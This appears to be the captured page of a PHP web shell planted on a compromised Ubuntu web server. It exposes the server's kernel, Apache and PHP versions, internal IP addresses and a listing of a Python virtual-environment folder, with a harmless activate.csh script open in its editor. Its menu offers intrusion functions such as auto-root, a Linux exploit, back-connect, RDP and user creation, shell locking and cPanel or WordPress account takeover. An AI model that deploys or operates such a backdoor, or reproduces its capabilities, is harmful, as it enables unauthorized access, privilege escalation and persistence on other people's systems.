Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
meetwize /
venv /
bin /
[ HOME SHELL ]
Name
Size
Permission
Action
Activate.ps1
8.82
KB
-rw-r--r--
activate
1.96
KB
-rw-r--r--
activate.csh
930
B
-rw-r--r--
activate.fish
2.15
KB
-rw-r--r--
convert-caffe2-to-onnx
283
B
-rwxr-xr-x
convert-onnx-to-caffe2
283
B
-rwxr-xr-x
f2py
247
B
-rwxr-xr-x
f2py3
247
B
-rwxr-xr-x
f2py3.10
247
B
-rwxr-xr-x
flask
239
B
-rwxr-xr-x
gunicorn
248
B
-rwxr-xr-x
nltk
236
B
-rwxr-xr-x
normalizer
264
B
-rwxr-xr-x
pip
252
B
-rwxr-xr-x
pip3
252
B
-rwxr-xr-x
pip3.10
252
B
-rwxr-xr-x
python
5.66
MB
-rwxr-xr-x
python3
5.66
MB
-rwxr-xr-x
python3.10
5.66
MB
-rwxr-xr-x
torchrun
251
B
-rwxr-xr-x
tqdm
238
B
-rwxr-xr-x
wheel
239
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : activate.csh
# This file must be used with "source bin/activate.csh" *from csh*. # You cannot run it directly. # Created by Davide Di Blasi <davidedb@gmail.com>. # Ported to Python 3.3 venv by Andrew Svetlov <andrew.svetlov@gmail.com> alias deactivate 'test $?_OLD_VIRTUAL_PATH != 0 && setenv PATH "$_OLD_VIRTUAL_PATH" && unset _OLD_VIRTUAL_PATH; rehash; test $?_OLD_VIRTUAL_PROMPT != 0 && set prompt="$_OLD_VIRTUAL_PROMPT" && unset _OLD_VIRTUAL_PROMPT; unsetenv VIRTUAL_ENV; unsetenv VIRTUAL_ENV_PROMPT; test "\!:*" != "nondestructive" && unalias deactivate' # Unset irrelevant variables. deactivate nondestructive setenv VIRTUAL_ENV /var/www/html/meetwize/website/venv set _OLD_VIRTUAL_PATH="$PATH" setenv PATH "$VIRTUAL_ENV/"bin":$PATH" set _OLD_VIRTUAL_PROMPT="$prompt" if (! "$?VIRTUAL_ENV_DISABLE_PROMPT") then set prompt = '(venv) '"$prompt" setenv VIRTUAL_ENV_PROMPT '(venv) ' endif alias pydoc python -m pydoc rehash
Close